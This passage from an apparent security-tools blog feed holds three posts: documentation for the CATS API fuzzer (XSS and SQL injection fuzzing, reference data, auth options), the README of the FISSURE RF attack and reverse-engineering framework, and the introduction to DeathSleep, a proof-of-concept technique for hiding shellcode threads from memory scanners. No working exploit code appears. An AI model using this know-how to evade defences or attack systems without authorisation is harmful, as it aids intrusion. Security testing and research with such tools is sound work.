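    targetFieldTypes:
      - string
    stringsFile: xss.txt
  test_2:
    description: Run SQL injection scenarios in string fields
    expectedResponseCode: 400
    httpMethod: all
    targetFieldTypes:
      - string
    stringsFile: sql_injection.txt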

Working with additionalProperties in SecurityFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

SecurityFuzzer Reserved keywords

The following keywords are reserved in SecurityFuzzer tests: output, expectedResponseCode, httpMethod, description, verify, oneOfSelection, targetFields, targetFieldTypes, stringsFile, additionalProperties, topElement and mapValues.

TemplateFuzzer

The TemplateFuzzer can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the TemplateFuzzer is as follows (very similar to curl):

> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url 

The command will:

  • send a POST request to http://service-url
  • use the {"field1":"value1","field2":"value2","field3":"value3"} as a template
  • replace one by one field1,field2,header with fuzz data and send each request to the service endpoint
  • ignore 2XX,4XX response codes and report an error when the received response code is not in this list

It was a deliberate choice to limit the fields for which the Fuzzer will run by supplying them using the -t argument. For nested objects, supply fully qualified names: field.subfield.

Headers can also be fuzzed using the same mechanism as the fields.

This Fuzzer will send the following type of data:

  • null values
  • empty values
  • zalgo text
  • abugidas characters
  • large random unicode data
  • very large strings (80k characters)
  • single and multi code point emojis
  • unicode control characters
  • unicode separators
  • unicode whitespaces

For a full list of options run > cats fuzz -h.

You can also supply your own dictionary of data using the -w file argument.
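
For example, a sketch of the earlier template fuzzed with a custom wordlist (my_dictionary.txt is a hypothetical file):

> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2"}' -t "field1,field2" -i "2XX,4XX" -w my_dictionary.txt http://service-url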

HTTP methods with bodies will only be fuzzed at the request payload and headers level.

HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d argument.

This is an example for a GET request:

> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" http://service-url/paths1?query1=test&query2

Reference Data File

There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:

/path/0.1/auth:
  prop#subprop: 12
  prop2: 33
  prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
  prop#test: 1

For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer. Consider this request payload:

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "cool street"
  },
  "name": "Joe"
}

and the following reference data file:

/path/0.1/auth:
  address#street: "My Street"
  name: "John"

This will result in any fuzzed request to the /path/0.1/auth endpoint being updated to contain the supplied fixed values:

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "My Street"
  },
  "name": "John"
}

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of ..

You can use environment (system) variables in a ref data file using: $$VARIABLE_NAME. (notice double $$)
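
For example (the apiKey field below is hypothetical):

/path/0.1/auth:
  apiKey: $$API_KEY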

Setting additionalProperties

As additional properties are maps i.e. they don't actually have a structure, CATS cannot currently generate valid values. If the elements within such a data structure are essential for a request, you can supply them via the refData file using the following syntax:

/path/0.1/auth:
  address#street: "My Street"
  name: "John"
  additionalProperties:
    topElement: metadata
    mapValues:
      test: "value1"
      anotherTest: "value2"

The additionalProperties element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement is not mandatory. The above example will output the following json (considering also the above examples):

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "My Street"
  },
  "name": "John",
  "metadata": {
    "test": "value1",
    "anotherTest": "value2"
  }
}

RefData reserved keywords

The following keywords are reserved in a reference data file: additionalProperties, topElement and mapValues.

Sending ref data for ALL paths

You can also send the same reference data for ALL paths (just as you do with the headers). You can achieve this by using all as a key in the refData file:

all:
  address#zip: 123

This will try to replace address#zip in all requests (if the field is present).

Removing fields

There are (rare) cases when some fields may not make sense together. Something like: if you send firstName and lastName, you are not allowed to also send name. As OpenAPI does not have the capability to mark request fields as dependent on (or exclusive of) each other, you can use the refData file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using cats_remove_field as the value for the fields you want to remove. For the above case the refData file will look as follows:

all:
  name: "cats_remove_field"

Creating a Ref Data file with the FunctionalFuzzer

You can leverage the fact that the FunctionalFuzzer can run functional flows in order to create dynamic --refData files that don't require manually setting the reference data values. The --refData file must be created with variables ${variable} instead of fixed values, and those variables must be output variables in the functionalFuzzer.yml file. In order for the FunctionalFuzzer to properly replace the variable names with their values, you must supply the --refData file as an argument when the FunctionalFuzzer runs.

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080 --refData=refData.yml

The functionalFuzzer.yml file:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id

The refData.yml file:

/pet-type:
  id: ${petId}

After running CATS using the command and the 2 files above, you will get a refData_replaced.yml file where the id will get the value returned in the petId variable.

The refData_replaced.yml:

/pet-type:
  id: 123

You can now use the refData_replaced.yml as a --refData file for running CATS with the rest of the Fuzzers.
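For example, assuming the contract and server from the commands above, a follow-up run could look like:

> cats --contract=contract.yml --server=http://localhost:8080 --refData=refData_replaced.yml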

Headers File

This can be used to send custom fixed headers with each payload. It is useful when you have authentication tokens you want to use to authenticate the API calls. You can use path specific headers or common headers that will be added to each call using an all element. Specific paths will take precedence over the all element. Sample headers file:

all:
  Accept: application/json
/path/0.1/auth:
  jwt: XXXXXXXXXXXXX
/path/0.2/cancel:
  jwt: YYYYYYYYYYYYY

This will add the Accept header to all calls and the jwt header to the specified paths. You can use environment (system) variables in a headers file using $$VARIABLE_NAME (notice the double $$).
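As an illustrative sketch, a headers file reading the token from the environment (JWT_TOKEN is a hypothetical variable name) could look like:

all:
  Accept: application/json
  jwt: "$$JWT_TOKEN"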

DELETE requests

DELETE is the only HTTP verb that is intended to remove resources, and executing the same DELETE request twice will result in the second one failing, as the resource is no longer available. Supplying a large list of identifiers within the --refData file would be quite cumbersome, which is why the recommendation used to be to skip the DELETE method when running CATS.

But starting with version 7.0.2, CATS has some intelligence in dealing with DELETE. In order to have enough valid entities, CATS saves the corresponding POST requests in an internal queue, and every time a DELETE request is executed it polls data from there. For this to actually work, your contract must comply with common-sense conventions:

  • the DELETE path is actually the POST path plus an identifier: if POST is /pets, then DELETE is expected to be /pets/{petId}
  • CATS will try to match the {petId} parameter within the body returned by the POST request, trying various combinations of the petId name: it will search for entries such as petId, id, pet-id and pet_id, with different cases
  • if any of those entries is found within a stored POST result, it will replace {petId} with that value

For example, suppose that a POST to /pets responds with:

{
  "pet_id": 2,
  "name": "Chuck"
}

When doing a DELETE request, CATS will discover that {petId} and pet_id are used as identifiers for the Pet resource, and will do the DELETE at /pets/2.

If these conventions are followed (which also align with good REST naming practices), it is expected that DELETE and POST requests will be on par for most of the entities.
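For illustration only, a contract fragment following this convention might look roughly like the sketch below (paths, response codes and types are made up, not taken from a real spec):

paths:
  /pets:
    post:
      responses:
        '200':
          description: pet created
  /pets/{petId}:
    delete:
      parameters:
        - name: petId
          in: path
          required: true
          schema:
            type: integer
      responses:
        '200':
          description: pet deleted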

Content Negotiation

Some APIs might use content negotiation versioning which implies formats like application/v11+json in the Accept header.

You can handle this in CATS as follows:

  • if the OpenAPI contract defines its content as:
  requestBody:
    required: true
    content:
      application/v5+json:
        schema:
          $ref: '#/components/RequestV5'
      application/v6+json:
        schema:
          $ref: '#/components/RequestV6'

by having clear separation between versions, you can pass the --contentType argument with the version you want to test: cats ... --contentType="application/v6+json".

If the OpenAPI contract is not version aware (you already exported it specific to a version) and the content looks like:

  requestBody:
    required: true
    content:
      application/json:
        schema:
          $ref: '#/components/RequestV5'

and you still need to pass the application/v5+json Accept header, you can use the --headers file to add it:

all:
  Accept: "application/v5+json"

Edge Spaces Strategy

There isn't a consensus on how services should handle valid values that are prefixed or trailed by spaces. One strategy is to have the service trim the spaces before doing the validation, while other services validate the values exactly as they are received. You can control how CATS should expect such cases to be handled by the service using the --edgeSpacesStrategy argument. You can set this to trimAndValidate or validateAndTrim depending on how you expect the service to behave:

  • trimAndValidate means that the service will first trim the spaces and after that run the validation
  • validateAndTrim means that the service runs the validation first without any trimming of spaces

This is a global setting, i.e. configured when CATS starts, and all Fuzzers expect consistent behaviour from all the service endpoints.
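For example, if the service is expected to trim spaces before validating (contract and server values are placeholders):

> cats --contract=contract.yml --server=http://localhost:8080 --edgeSpacesStrategy=trimAndValidate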

URL Parameters

There are cases when certain parts of the request URL are parameterized. For example a case like: /{version}/pets. {version} is supposed to have the same value for all requests. This is why you can supply actual values to replace such parameters using the --urlParams argument. You can supply a ; separated list of name:value pairs to replace the name parameters with their corresponding value. For example supplying --urlParams=version:v1.0 will replace the version parameter from the above example with the value v1.0.
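A sketch with two URL parameters (the tenant parameter is purely illustrative):

> cats --contract=contract.yml --server=http://localhost:8080 --urlParams="version:v1.0;tenant:demo"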

Dealing with AnyOf, AllOf and OneOf

CATS also supports schemas with oneOf, allOf and anyOf composition. CATS will consider all possible combinations when creating the fuzzed payloads.
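For illustration, a schema composed with oneOf like the sketch below (all names are made up) would lead CATS to generate and fuzz payloads for each variant:

components:
  schemas:
    Payment:
      oneOf:
        - $ref: '#/components/schemas/CardPayment'
        - $ref: '#/components/schemas/BankTransfer'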

Dynamic values in configuration files

The following configuration files: securityFuzzerFile, functionalFuzzerFile, refData support setting dynamic values for the inner fields. For now the support only exists for java.time.* and org.apache.commons.lang3.*, but more types of elements will come in the near future.

Let's suppose you have a date/date-time field, and you want to set it to 10 days from now. You can do this by setting this as a value T(java.time.OffsetDateTime).now().plusDays(10). This will return an ISO compliant time in UTC format.

A functionalFuzzer using this can look like:

/path:
  testNumber:
    description: Short description of the test
    prop: value
    prop#subprop: "T(java.time.OffsetDateTime).now().plusDays(10)"
    prop7:
      - value1
      - value2
      - value3
    oneOfSelection:
      element#type: "Value"
    expectedResponseCode: HTTP_CODE
    httpMethod: HTTP_METHOD

You can also check the responses using a similar syntax, accounting for the actual values returned in the response. This is a syntax that can test if a returned date is after the current date: T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString())). It will check if the expiry field returned in the json response, parsed as a date, is after the current date.

The syntax of dynamically setting dates is compliant with the Spring Expression Language specs.
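The same expressions can be used in a refData file; a minimal sketch (the expiry field name is hypothetical):

/path/0.1/auth:
  expiry: "T(java.time.OffsetDateTime).now().plusDays(10)"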

Running behind proxy

If you need to run CATS behind a proxy, you can supply the following arguments: --proxyHost and --proxyPort. A typical run with proxy settings on localhost:8080 will look as follows:

> cats --contract=YAML_FILE --server=SERVER_URL --proxyHost=localhost --proxyPort=8080

Dealing with Authentication

HTTP header(s) based authentication

CATS supports any form of HTTP header(s)-based authentication (basic auth, oauth, custom JWT, apiKey, etc.) using the headers mechanism. You can supply the specific HTTP header name and value and apply them to all endpoints. Additionally, basic auth is also supported using the --basicauth=USR:PWD argument.
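For example, a run combining a headers file holding a custom token with basic auth (file name and credentials are placeholders):

> cats --contract=contract.yml --server=http://localhost:8080 --headers=headers.yml --basicauth=user:password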

One-Way or Two-Way SSL

By default, CATS trusts all server certificates and doesn't perform hostname verification.

For two-way SSL you can specify a JKS file (Java Keystore) that holds the client's private key using the following arguments:

  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key within the sslKeystore

For details on how to load the certificate and private key into a Java Keystore you can use this guide: https://mrkandreev.name/blog/java-two-way-ssl/.
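A sketch of a two-way SSL run (keystore file name and passwords are placeholders):

> cats --contract=contract.yml --server=https://localhost:8443 --sslKeystore=client.jks --sslKeystorePwd=changeit --sslKeyPwd=changeit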

Limitations

Native Binaries

When using the native binaries (not the uberjar) there might be issues when using dynamic values in the CATS files. This is due to the fact that GraalVM only bundles whatever it can discover at compile time. The following classes are currently supported:

java.util.Base64.Encoder.class, java.util.Base64.Decoder.class, java.util.Base64.class, org.apache.commons.lang3.RandomUtils.class, org.apache.commons.lang3.RandomStringUtils.class, 
org.apache.commons.lang3.DateFormatUtils.class, org.apache.commons.lang3.DateUtils.class,
org.apache.commons.lang3.DurationUtils.class, java.time.LocalDate.class, java.time.LocalDateTime.class, java.time.OffsetDateTime.class

API specs

At this moment, CATS only works with OpenAPI specs and has limited functionality using template payloads through the cats fuzz ... subcommand.

Media types and HTTP methods

The Fuzzers have the following support for media types and HTTP methods:

  • application/json and application/x-www-form-urlencoded media types only
  • HTTP methods: POST, PUT, PATCH, GET and DELETE

Additional Parameters

If a response contains a free-form Map specified using the additionalParameters tag, CATS will issue a WARN-level log message, as it won't be able to validate that the response matches the schema.

Regexes within 'pattern'

CATS uses RgxGen in order to generate Strings based on regexes. This has certain limitations mostly with complex patterns.

Custom Files General Info

All custom files that can be used by CATS (functionalFuzzerFile, headers, refData, etc.) are in YAML format. When setting or getting values to/from JSON for input and/or output variables, you must use JsonPath syntax with either # or . as separators. You can find some selector examples here: JsonPath.

Contributing

Please refer to CONTRIBUTING.md.



FISSURE - Frequency Independent SDR-based Signal Understanding and Reverse Engineering

18 September 2022 at 11:30
By: Zion3R


Frequency Independent SDR-based Signal Understanding and Reverse Engineering

FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.

The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.

The friendly Python codebase and user interface allow beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.


Getting Started

Supported

There are two branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7; while the Python3_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8.

Operating System FISSURE Branch
Ubuntu 18.04 (x64) Python2_maint-3.7
Ubuntu 18.04.5 (x64) Python2_maint-3.7
Ubuntu 18.04.6 (x64) Python2_maint-3.7
Ubuntu 20.04.1 (x64) Python3_maint-3.8
Ubuntu 20.04.4 (x64) Python3_maint-3.8

In-Progress (beta)

Operating System FISSURE Branch
Ubuntu 22.04 (x64) Python3_maint-3.8

Note: Certain software tools do not work for every OS. Refer to Software And Conflicts.

Installation

git clone https://github.com/ainfosec/fissure.git
cd FISSURE
git checkout <Python2_maint-3.7> or <Python3_maint-3.8>
./install

This will automatically install PyQt software dependencies required to launch the installation GUIs if they are not found.

Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).


Python2_maint-3.7 Python3_maint-3.8

It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.


Usage

fissure

Refer to the FISSURE Help menu for more details on usage.

Details

Components

  • Dashboard
  • Central Hub (HIPRFISR)
  • Target Signal Identification (TSI)
  • Protocol Discovery (PD)
  • Flow Graph & Script Executor (FGE)


Capabilities

  • Signal Detector
  • IQ Manipulation
  • Signal Lookup
  • Pattern Recognition
  • Attacks
  • Fuzzing
  • Signal Playlists
  • Image Gallery
  • Packet Crafting
  • Scapy Integration
  • CRC Calculator
  • Logging


Lessons

FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.

  • Lesson1: OpenBTS
  • Lesson2: Lua Dissectors
  • Lesson3: Sound eXchange
  • Lesson4: ESP Boards
  • Lesson5: Radiosonde Tracking
  • Lesson6: RFID
  • Lesson7: Data Types
  • Lesson8: Custom GNU Radio Blocks
  • Lesson9: TPMS
  • Lesson10: Ham Radio Exams
  • Lesson11: Wi-Fi Tools

Roadmap

  • Add more hardware types, RF protocols, signal parameters, analysis tools
  • Support more operating systems
  • Create a signal conditioner, feature extractor, and signal classifier with selectable AI/ML techniques
  • Develop class material around FISSURE (RF Attacks, Wi-Fi, GNU Radio, PyQt, etc.)
  • Transition the main FISSURE components to a generic sensor node deployment scheme

Contributing

Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the Discussions page if you have any thoughts regarding the following:

  • New feature suggestions and design changes
  • Software tools with installation steps
  • New lessons or additional material for existing lessons
  • RF protocols of interest
  • More hardware and SDR types for integration
  • IQ analysis scripts in Python
  • Installation corrections and improvements

Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:

  1. Fork the project
  2. Create your feature branch (git checkout -b feature/AmazingFeature)
  3. Commit your changes (git commit -m 'Add some AmazingFeature')
  4. Push to the branch (git push origin feature/AmazingFeature)
  5. Open a pull request

Creating Issues to bring attention to bugs is also welcomed.

Collaborating

Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunities, whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.

License

GPL-3.0

For license details, see LICENSE file.

Contact

Follow on Twitter: @FissureRF, @AinfoSec

Chris Poore - Assured Information Security, Inc. - [email protected]

Business Development - Assured Information Security, Inc. - [email protected]

Acknowledgments

Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.



DeathSleep - A PoC Implementation For An Evasion Technique To Terminate The Current Thread And Restore It Before Resuming Execution, While Implementing Page Protection Changes During No Execution

17 September 2022 at 11:30
By: Zion3R


A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.


Intro

Sleep and obfuscation methods are well known in the maldev community. Although implementations differ, they share the objective of hiding from memory scanners while sleeping, usually by changing page protections and sometimes adding features like encrypting the shellcode. But there is another important aspect of hiding our shellcode: hiding the current execution thread. Spoofing the stack is cool, but after thinking a little about it I thought that there is no need to spoof the stack… if there is no stack :)

The usability of this technique is left to the reader to assess, but in any case, I think it is a cool way to review some topics, and learn some maldev for those who, like me, are starting in this world.

The main implementation shown here holds everything that we need to take out of the stack in the data section, as global variables, but an implementation moving everything to the heap will be published soon. It aims to show some key modifications that need to be done to make this code position independent (PIC) and injectable.

This repository is mirrored between GitHub and GitLab.


